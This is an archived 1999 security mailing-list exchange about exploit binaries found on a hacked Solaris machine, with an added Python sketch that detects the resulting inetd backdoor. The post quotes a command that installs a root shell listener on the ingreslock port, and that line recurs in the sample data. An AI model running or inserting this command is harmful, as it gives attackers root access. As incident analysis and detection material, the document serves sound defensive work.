I found two binary-only exploits on a hacked machine. The one of most interest
was "amexp" which when executed without arguments presents the following:

Usage: ./amexp address cache command type [port]
Further help:
  address - system address
  cache - system hostname
  command - execute this command
  type - 0: Solaris 2.5.1 stock, 1: Solaris 2.5.1 patched, 2.6 & 2.7
  port - optional port to bypass portmapper

A shell script that was included was "go.amexp" which contained:

./amexp $1 $2 "echo 'ingreslock stream tcp nowait root /bin/sh sh' > /tmp/.xp;/usr/sbin/inetd -s /tmp/.xp" $3

The command is nearly identical to what is used for both tooltalk and
rpc.cmsd attacks.

The proper patches were installed and I do not believe that it is the
statd/automountd exploit since no indirect rpc services execution was
attempted.

This incident is closed.

----- Original Message -----
From: Tabor J . Wells <[EMAIL PROTECTED]>
To: Bob Todd <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Tuesday, August 24, 1999 1:52 PM
Subject: Re: Vulnerability in Solaris 2.6. rpc.statd ?

> On Sat, Aug 21, 1999 at 12:31:18PM -0400,
> Bob Todd <[EMAIL PROTECTED]> is thought to have said:
>
> > While performing an on-site incident response at
> > _______, I found several
> > Solaris-oriented exploit programs including a
> > statd2.6 (others were calendar
> > manager, tooltalk, and lockd?). Since there is an
> > exploit program for statd on
> > Solaris 2.6, I could conclude that Solaris 2.6
> > statd is vulnerable to attack. I
> > have not tried the exploit, but since the machine
> > was probably compromised
> > by one of these programs, the threat seems real!!
>
> And did this server have the statd patch installed (106592-02 on sparc and
> 106593-02 on x86)? Did it have the various security patches for the other
> services mentioned installed as well?
>
> Perhaps the program was part of the exploit which allowed indirect RPC
> calls with statd that was discussed here (and elsewhere) several weeks
> back.
>
> I don't think your conclusion is supported given the information you
> provided. Perhaps you could provide more information about the exploit
> before rushing to claim that there is a new vulnerability.
>
> Tabor
>
> --
> ________________________________________________________________________
> Tabor J. Wells                                     [EMAIL PROTECTED]
> Technology Manager                      http://www.smarterliving.com
> Smarter Living, Inc.                It's your time. It's your money.
>
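
Added example, not part of the original thread and not code from either poster: a detection sketch for the artifact the go.amexp command leaves behind, namely an inetd-style entry that runs a shell as root and an inetd process started with a non-standard configuration file. The function names, the trusted-path list and the sample data are assumptions constructed for illustration.

```python
import os

SHELLS = {"sh", "jsh", "csh", "ksh", "tcsh", "bash", "zsh"}
# Assumption: the stock Solaris locations of the inetd configuration.
TRUSTED_CONFS = ("/etc/inetd.conf", "/etc/inet/inetd.conf")
FIELDS = ("service", "socket", "proto", "wait", "user", "program", "args")

def parse_inetd_line(line):
    """Split one inetd.conf entry into its fields; None for blanks/comments."""
    parts = line.split("#", 1)[0].split(None, 6)
    if len(parts) < 6:          # "internal" services have no args field
        return None
    return dict(zip(FIELDS, parts + [""] * (7 - len(parts))))

def find_shell_listeners(conf_text):
    """Return (line number, service, user, program) for entries that spawn a shell."""
    hits = []
    for lineno, raw in enumerate(conf_text.splitlines(), 1):
        entry = parse_inetd_line(raw)
        if entry and os.path.basename(entry["program"]) in SHELLS:
            hits.append((lineno, entry["service"], entry["user"], entry["program"]))
    return hits

def find_rogue_inetd(ps_lines):
    """Return config paths passed to inetd that are not in TRUSTED_CONFS."""
    rogue = []
    for line in ps_lines:
        argv = line.split()
        for i, tok in enumerate(argv):
            if os.path.basename(tok) == "inetd":
                rogue += [a for a in argv[i + 1:]
                          if not a.startswith("-") and a not in TRUSTED_CONFS]
                break
    return rogue

# Constructed sample data (not taken from the incident).
SAMPLE_CONF = """\
# constructed inetd.conf-style sample
telnet      stream  tcp  nowait  root  /usr/sbin/in.telnetd  in.telnetd
echo        stream  tcp  nowait  root  internal
ingreslock  stream  tcp  nowait  root  /bin/sh  sh
"""
SAMPLE_PS = [
    "root   141     1  0   Aug 20 ?  0:00 /usr/sbin/inetd -s",
    "root  9021     1  0   Aug 21 ?  0:00 /usr/sbin/inetd -s /tmp/.xp",
]

if __name__ == "__main__":
    print(find_shell_listeners(SAMPLE_CONF))
    print(find_rogue_inetd(SAMPLE_PS))
```

On a live host the same checks would be fed the real configuration file, any stray files in world-writable directories, and the output of ps.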